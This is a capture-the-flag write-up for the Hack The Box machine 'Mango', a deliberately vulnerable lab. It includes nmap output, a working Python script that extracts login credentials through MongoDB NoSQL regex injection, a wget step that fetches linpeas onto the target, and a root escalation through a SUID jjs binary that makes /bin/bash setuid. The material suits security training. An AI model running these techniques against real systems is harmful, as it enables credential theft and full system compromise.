Mango
Mango is a very well crafted machine and I really enjoyed working on this machine as it presents lot of learning opportunities. Enumeration is the key on this box and also some scripting knowledge will be required.
Recon
Lets kick off the namp scan -
1# nmap -sS -sC -sV -O -T4 -oN mango.htb.nmap.txt 10.10.10.162
2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-10 17:32 EST
3Nmap scan report for 10.10.10.162
4Host is up (0.024s latency).
5Not shown: 997 closed ports
6PORT STATE SERVICE VERSION
722/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
8| ssh-hostkey:
9| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
10| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
11|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
1280/tcp open http Apache httpd 2.4.29 ((Ubuntu))
13|_http-server-header: Apache/2.4.29 (Ubuntu)
14|_http-title: 403 Forbidden
15443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
16|_http-server-header: Apache/2.4.29 (Ubuntu)
17|_http-title: Mango | Search Base
18| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
19| Not valid before: 2019-09-27T14:21:19
20|_Not valid after: 2020-09-26T14:21:19
21|_ssl-date: TLS randomness does not represent time
22| tls-alpn:
23|_ http/1.1
24No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
25TCP/IP fingerprint:
26OS:SCAN(V=7.91%E=4%D=12/10%OT=22%CT=1%CU=36516%PV=Y%DS=2%DC=I%G=Y%TM=5FD2A2
27OS:25%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS
28OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
29OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
30OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
31OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
32OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
33OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
34OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
35OS:=S)
36
37Network Distance: 2 hops
38Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
39
40OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
41Nmap done: 1 IP address (1 host up) scanned in 28.27 seconds
42
Notes:
- We have SSH and webserver running on this machine
- Its a linux server, possibly running Ubuntu and the webserver is - Apache/2.4.29
- The SSL cert reveals that there could be a subdomain - staging-order.mango.htb
Enumeration
For the subdomain to be accessible, lets update the /etc/hosts on our attack machine and point the domain mango.htb as well as the subdomain staging-order.mango.htb to the IP of the machine.
Fire up the gobuster/dirbuster and run it for both the domain and subdomain. One of the interesting directories is vendor where we can see composer indicating that the webserver is running php. installed.json at the URL below will reveal that the backend is a mongodb database.
view-source:http://staging-order.mango.htb/vendor/composer/installed.json
After trying several other rabbit holes, I decided to give a go at the nosql injection and stmbled upon the following -
https://book.hacktricks.xyz/pentesting-web/nosql-injection https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
The script was easy to work with and revealed two users - admin and mango
1python3 enumerate_nosql.py -u http://staging-order.mango.htb -up username -pp password -ep username -op login:login -m post
2
3
4python3 enumerate_nosql.py -u http://staging-order.mango.htb -up username -pp password -ep username -op login:login -m post
5No pattern starts with '0'
6No pattern starts with '1'
7No pattern starts with '2'
8No pattern starts with '3'
9No pattern starts with '4'
10No pattern starts with '5'
11No pattern starts with '6'
12No pattern starts with '7'
13No pattern starts with '8'
14No pattern starts with '9'
15Pattern found that starts with 'a'
16Pattern found: ad
17Pattern found: adm
18Pattern found: admi
19Pattern found: admin
20username found: admin
21No pattern starts with 'b'
22No pattern starts with 'c'
23No pattern starts with 'd'
24No pattern starts with 'e'
25No pattern starts with 'f'
26No pattern starts with 'g'
27No pattern starts with 'h'
28No pattern starts with 'i'
29No pattern starts with 'j'
30No pattern starts with 'k'
31No pattern starts with 'l'
32Pattern found that starts with 'm'
33Pattern found: ma
34Pattern found: man
35Pattern found: mang
36Pattern found: mango
37username found: mango
38No pattern starts with 'n'
39
40
412 username(s) found:
42admin
43mango
44
Now, lets limit the usernames to just admin and mango and pass that to the password guessing function as below -
1import requests
2import string
3
4url = "http://staging-order.mango.htb"
5headers = {"Host": "staging-order.mango.htb"}
6cookies = {"PHPSESSID": "bdjh6mo6p9nsv6os7a3s2susig"}
7possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
8def get_password(username):
9 print("Extracting password of "+username)
10 params = {"username":username, "password[$regex]":"", "login": "login"}
11 password = "^"
12 while True:
13 for c in possible_chars:
14 params["password[$regex]"] = password + c + ".*"
15 pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
16 if int(pr.status_code) == 302:
17 password += c
18 break
19 if c == possible_chars[-1]:
20 print("Found password "+password[1:].replace("\\", "")+" for username "+username)
21 return password[1:].replace("\\", "")
22
23def get_usernames():
24 usernames = []
25 params = {"username[$regex]":"", "password[$regex]":".*", "login": "login"}
26 for c in possible_chars:
27 username = "^" + c
28 params["username[$regex]"] = username + ".*"
29 pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
30 if int(pr.status_code) == 302:
31 print("Found username starting with "+c)
32 while True:
33 for c2 in possible_chars:
34 params["username[$regex]"] = username + c2 + ".*"
35 if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:
36 username += c2
37 print(username)
38 break
39
40 if c2 == possible_chars[-1]:
41 print("Found username: "+username[1:])
42 usernames.append(username[1:])
43 break
44 return usernames
45
46userlist = ['admin','mango']
47# for u in get_usernames():
48for u in userlist:
49 get_password(u)
50
Now, run the script and you should have both passwords -
1python3 ./nosql-bruteforce-creds.py
2Extracting password of admin
3Found password tXXXXXXXXXXXXXX#2 for username admin
4Extracting password of mango
5Found password h3mXXXXXXXXXXX5H for username mango
6
Exploit
Now, lets login over ssh as mango -
1ssh [email protected]
2The authenticity of host 'mango.htb (10.10.10.162)' can't be established.
3ECDSA key fingerprint is SHA256:AhHG3k5r1ic/7nEKLWHXoNm0m28uM9W8heddb9lCTm0.
4Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
5Warning: Permanently added 'mango.htb,10.10.10.162' (ECDSA) to the list of known hosts.
6[email protected]'s password:
7Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
8
9 * Documentation: https://help.ubuntu.com
10 * Management: https://landscape.canonical.com
11 * Support: https://ubuntu.com/advantage
12
13 System information as of Fri Dec 11 17:48:36 UTC 2020
14
15 System load: 0.08 Processes: 103
16 Usage of /: 26.9% of 19.56GB Users logged in: 0
17 Memory usage: 19% IP address for ens33: 10.10.10.162
18 Swap usage: 0%
19
20
21 * Canonical Livepatch is available for installation.
22 - Reduce system reboots and improve kernel security. Activate at:
23 https://ubuntu.com/livepatch
24
25122 packages can be updated.
2618 updates are security updates.
27
28
29Last login: Mon Sep 30 02:58:45 2019 from 192.168.142.138
30mango@mango:~$ sudo -l
31[sudo] password for mango:
32Sorry, user mango may not run sudo on mango.
33mango@mango:~$ ls
34
Lets copy the linpeas.sh over and execute to enumerate further -
1
2/linPEAS$ python3 -m http.server
3Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
410.10.10.162 - - [11/Dec/2020 13:50:29] "GET /linpeas.sh HTTP/1.1" 200 -
5
6
7
8wget http://10.10.14.25:8000/linpeas.sh
9--2020-12-11 18:58:14-- http://10.10.14.25:8000/linpeas.sh
10Connecting to 10.10.14.25:8000... connected.
11HTTP request sent, awaiting response... 200 OK
12Length: 300193 (293K) [text/x-sh]
13Saving to: ‘linpeas.sh’
14
15linpeas.sh 100%[===============================================>] 293.16K 790KB/s in 0.4s
16
172020-12-11 18:58:15 (790 KB/s) - ‘linpeas.sh’ saved [300193/300193]
Post-exploit
Linpeas will reveal that there is a suid executable that we can exploit at - /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs and GTFOBins has a one line script that can help us escape to shell.
However, the binary is only executable by root user and admin group. We already have the admin password and we can do su - admin to become admin user.
1jjs> admin@mango:/tmp$ echo "Java.type('java.lang.Runtime').getRuntime().exec('chmod +s /bin/bash').waitFor()" | jjs
2Warning: The jjs tool is planned to be removed from a future JDK release
3jjs> Java.type('java.lang.Runtime').getRuntime().exec('chmod +s /bin/bash').waitFor()
40
5
6bash-4.4$ ./bash -p
7bash-4.4# ls
8bash root.txt tmux-1000
9hsperfdata_root systemd-private-baebb2e962894d26b9de6ad944174518-apache2.service-fiNfaB vmware-root_406-558405545
10linpeas.sh systemd-private-baebb2e962894d26b9de6ad944174518-systemd-resolved.service-pd1pg3
11mongodb-27017.sock systemd-private-baebb2e962894d26b9de6ad944174518-systemd-timesyncd.service-dk1Wi0
Now you are root -
1bash-4.4# id
2uid=4000000000(admin) gid=1001(admin) euid=0(root) groups=1001(admin)
3bash-4.4# whoami
4root
5bash-4.4# cd /root
6bash-4.4# ls -all
7total 40
8drwx------ 6 root root 4096 Oct 10 2019 .
9drwxr-xr-x 23 root root 4096 Sep 27 2019 ..
10lrwxrwxrwx 1 root root 9 Sep 27 2019 .bash_history -> /dev/null
11-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
12drwx------ 2 root root 4096 Sep 30 2019 .cache
13drwx------ 3 root root 4096 Sep 30 2019 .gnupg
14drwxr-xr-x 3 root root 4096 Sep 30 2019 .local
15-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
16-r-------- 1 root root 33 Dec 11 15:13 root.txt
17drwx------ 2 root root 4096 Sep 27 2019 .ssh
18-rw------- 1 root root 3895 Oct 10 2019 .viminfo
19bash-4.4# cat root.txt
2007XXXXXXXXXXXXXXXXXXXXXXXXXXXd89
21bash-4.4#
22